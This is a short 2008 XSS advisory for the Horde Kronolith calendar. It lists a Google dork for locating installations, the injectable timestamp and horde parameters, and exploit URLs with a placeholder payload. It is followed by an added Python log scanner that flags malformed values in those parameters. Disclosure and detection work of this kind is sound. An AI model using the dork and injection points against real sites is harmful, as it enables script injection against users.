+==========================================================================+
+     Horde & Kronolith Calendar Application & XSS Vulnerabilities         +
+==========================================================================+

Author(s): Ivan Sanchez
Product:   Kronolith Calendar Application
Web:       http://www.horde.org/kronolith/
Versions:  Kronolith: Copyright 2000-2003
Date:      23/05/2008

Kronolith is the Horde calendar application.

GOOGLE DORKS:
------------
intext:"Kronolith: Copyright 2000-2003"

Evil Functions:
---------------
week.php?
workweek.php?
day.php?
horde=

Internal Variables:
-------------------
timestamp=xss
horde=xss

Exploits:
----------
Insert evil code into these variables, then run the exploit !!!

http://site/horde2/kronolith/week.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde2/kronolith/workweek.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde/kronolith/day.php?timestamp=< XSS EVIL REMOTE CODE >
https://site/horde/kronolith/horde= < XSS EVIL REMOTE CODE >

Coming soon: more XSS !!!

NULL CODE SERVICES [ www.nullcode.com.ar ]
Hunting Security Bugs!
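
Added example (not part of the original advisory, and not Horde code): a log check that flags requests carrying malformed values in the parameters listed above. It assumes combined-format access logs, that timestamp is normally a digits-only Unix time, and that horde carries a PHP session id; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory names as reflecting the "timestamp" parameter.
SCRIPTS = ("week.php", "workweek.php", "day.php")
# Assumption: a legitimate timestamp is a Unix time, i.e. digits only.
TIMESTAMP_OK = re.compile(r"\d{1,12}")
# Assumption: "horde" carries a PHP session id (letters, digits, ',' and '-').
HORDE_OK = re.compile(r"[A-Za-z0-9,-]{1,128}")
# Request part of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return sorted names of advisory parameters whose decoded value is malformed."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    in_kronolith = "/kronolith/" in parts.path
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    # The advisory's last URL puts "horde=" directly after the path, so parse that too.
    pairs += parse_qsl(script, keep_blank_values=True)
    bad = set()
    for name, value in pairs:
        if name == "timestamp" and in_kronolith and script in SCRIPTS and not TIMESTAMP_OK.fullmatch(value):
            bad.add(name)
        elif name == "horde" and in_kronolith and not HORDE_OK.fullmatch(value):
            bad.add(name)
    return sorted(bad)

def scan(lines):
    """Yield (line_number, url, bad_params) for each log line worth reviewing."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        bad = suspicious_params(match.group(1)) if match else []
        if bad:
            yield number, match.group(1), bad

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2008:10:00:01 +0000] "GET /horde/kronolith/day.php?timestamp=1211500800 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [23/May/2008:10:00:09 +0000] "GET /horde2/kronolith/week.php?timestamp=%3Cb%3Eprobe%3C/b%3E HTTP/1.1" 200 5342',
    '192.0.2.77 - - [23/May/2008:10:00:12 +0000] "GET /horde/kronolith/?horde=%22%3E%3Ci%3E HTTP/1.1" 200 4711',
    '192.0.2.10 - - [23/May/2008:10:00:20 +0000] "GET /horde/kronolith/workweek.php?timestamp=1211587200&horde=a1b2c3d4 HTTP/1.1" 200 5201',
]

if __name__ == "__main__":
    for number, url, bad in scan(SAMPLE_LOG):
        print(f"line {number}: {url} -> malformed {', '.join(bad)}")
```

Values are percent-decoded before validation, so encoded markup in either parameter is flagged the same way as raw markup.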